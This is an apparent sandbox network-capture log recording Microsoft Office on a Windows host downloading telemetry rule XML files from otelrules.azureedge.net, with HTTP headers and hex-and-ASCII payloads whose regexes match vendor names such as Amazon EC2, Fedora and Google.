                                                                                                                                                                        2024-11-24 04:11:42 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        52192.168.2.74976013.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:41 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:41 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 491
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                        ETag: "0x8DC582B98B88612"
                                                                                                                                                                        x-ms-request-id: 2abfc2a9-b01e-003d-094d-3cd32c000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041141Z-15b8b599d88pxmdghC1TEBux9c00000003yg00000000h40a
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:42 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        53192.168.2.74975913.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:41 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:41 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 448
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                        ETag: "0x8DC582BB389F49B"
                                                                                                                                                                        x-ms-request-id: 98e24ef8-f01e-0052-0940-3c9224000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041141Z-15b8b599d88hr8sfhC1TEBbca400000003qg00000000h2v2
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:42 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        54192.168.2.74976213.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:41 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:42 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 416
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                                                        ETag: "0x8DC582BAEA4B445"
                                                                                                                                                                        x-ms-request-id: ecf1de78-401e-0047-5d4b-3c8597000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041142Z-178bfbc474brk967hC1NYCfu60000000057g000000009r5w
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:42 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        55192.168.2.74976413.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:43 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:44 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:44 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 415
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                        ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                        x-ms-request-id: 1aaae978-201e-0096-4377-3bace6000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041144Z-174c587ffdfcj798hC1TEB9bq40000000440000000005afd
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:44 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        56192.168.2.74976313.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:43 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:44 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:44 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 479
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                        ETag: "0x8DC582B989EE75B"
                                                                                                                                                                        x-ms-request-id: 79b51860-701e-0021-623a-3c3d45000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041144Z-174c587ffdfks6tlhC1TEBeza40000000410000000005yuk
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:44 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        57192.168.2.74976513.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:43 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:44 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:44 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 471
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                        ETag: "0x8DC582B97E6FCDD"
                                                                                                                                                                        x-ms-request-id: 79a9dcb6-201e-003c-1c7b-3b30f9000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041144Z-174c587ffdf6b487hC1TEBydsn00000003x0000000004mzy
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:44 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        58192.168.2.74976613.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:43 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:44 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:44 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                        ETag: "0x8DC582B9C710B28"
                                                                                                                                                                        x-ms-request-id: 3074f9d5-701e-001e-47fc-3df5e6000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041144Z-178bfbc474bwlrhlhC1NYCy3kg00000005a000000000p1y3
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:44 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        59192.168.2.74976713.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:44 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:44 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:44 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 477
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                                                        ETag: "0x8DC582BA54DCC28"
                                                                                                                                                                        x-ms-request-id: 38a668eb-401e-00ac-34a1-3b0a97000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041144Z-15b8b599d88s6mj9hC1TEBur3000000003ug000000002e9d
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:44 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        60192.168.2.74976913.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:46 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:46 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:46 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 477
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                                                        ETag: "0x8DC582BA48B5BDD"
                                                                                                                                                                        x-ms-request-id: 43acaf28-701e-006f-5cf7-3cafc4000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041146Z-178bfbc474bmqmgjhC1NYCy16c00000005k0000000004y5p
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:11:46 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        61192.168.2.74976813.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:46 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:46 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:46 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                        ETag: "0x8DC582BB7F164C3"
                                                                                                                                                                        x-ms-request-id: 7bd180c9-401e-008c-0e8c-3a86c2000000
